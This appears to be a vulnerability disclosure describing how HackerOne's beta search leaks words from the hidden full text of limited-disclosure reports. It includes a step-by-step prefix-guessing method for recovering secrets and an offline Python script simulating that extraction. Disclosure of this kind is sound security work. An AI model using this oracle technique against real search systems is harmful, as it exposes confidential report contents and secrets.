Similar to https://hackerone.com/reports/685909
An attacker can search for words that appear only in the full text of a limited-disclosure report and learn whether they exist there. HackerOne returns a match when the word exists anywhere in the full report, rather than only in the publicly visible limited part (e.g. summary/title) of the report.
Have the new beta search feature enabled, then search for:
addProjectV2ItemById AND reporter:("ahacker1")
(This phrase appears only in the full report, not in the limited-disclosure version, yet the search still matches it.)
For example, if there is a secret inside the full report (but not inside the limited portion), the attacker can leak it one character at a time with many searches, because each search acts as a yes/no oracle on whether a prefix of the secret is present.
Suppose the secret starts with PREFIX_
The attacker then searches for:
PREFIX_a
PREFIX_b
…
until one of them matches in the report, say
PREFIX_k
The attacker then continues by searching for
PREFIX_ka
PREFIX_kb
PREFIX_kc
…
until the next match, say
PREFIX_ko
This is repeated until no candidate character extends the prefix any further, i.e. the attacker has reached the end of the secret and has recovered it in full.
The number of searches needed is roughly:
about 30 candidate characters to try per position (worst case; on average about half of them are needed before a match) * 40 (average length of a secret)
= about 1200 searches
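The prefix-extension procedure above, written out as an added example (this is not code from the report or from HackerOne). The real oracle is the HackerOne search box; here it is replaced by a local function over a constructed "full report" string so the script runs offline. The prefix-matching behaviour of the search, the candidate alphabet, and the query format built from the report's `reporter:(...)` filter are all assumptions.

```python
"""Simulate leaking a secret from a limited-disclosure report through a
search oracle, one character per step (added illustration, not the
report's own code)."""
import string

# Constructed sample standing in for the hidden full report body.
FULL_REPORT = (
    "Steps to reproduce: authenticate with the leaked token "
    "PREFIX_kol3qx9 and call the internal API."
)

# Characters tried at each position. The report estimates ~30 candidates
# per position; this 37-symbol alphabet is an assumption for the demo.
ALPHABET = string.ascii_lowercase + string.digits + "_"


def make_search_oracle(full_report: str):
    """Return (search, counter). `search(term)` mimics the leaky search:
    True iff some token of the full report starts with `term`.
    Prefix matching is an assumption about how the real search behaves."""
    tokens = [tok.strip(".,;:!?()") for tok in full_report.split()]
    counter = {"queries": 0}

    def search(term: str) -> bool:
        counter["queries"] += 1
        return any(tok.startswith(term) for tok in tokens)

    return search, counter


def build_query(term: str, reporter: str) -> str:
    """Hypothetical search string in the same shape as the report's
    example query, combining the probe with a reporter filter."""
    return f'{term} AND reporter:("{reporter}")'


def extract_secret(search, prefix: str, alphabet: str, max_len: int = 64) -> str:
    """Extend `prefix` one character at a time, asking the oracle whether
    the longer prefix still matches. Stops when no candidate character
    extends the prefix (end of secret) or when max_len is reached."""
    current = prefix
    while len(current) < max_len:
        for ch in alphabet:
            if search(current + ch):
                current += ch
                break
        else:
            # No candidate extended the prefix: the secret is complete
            # (or contains a character outside the alphabet).
            break
    return current


if __name__ == "__main__":
    search, counter = make_search_oracle(FULL_REPORT)
    secret = extract_secret(search, "PREFIX_", ALPHABET)
    print(f"recovered {secret!r} after {counter['queries']} searches")
    print("a real probe would look like:", build_query(secret, "ahacker1"))
```

Note that the extraction stops at the first character not in the alphabet, so an attacker who does not know the secret's character set has to widen `ALPHABET` (uppercase, symbols) at the cost of more queries per position; the 7 characters after `PREFIX_` in the constructed sample cost 182 searches with this 37-symbol alphabet, in line with the per-character estimate above.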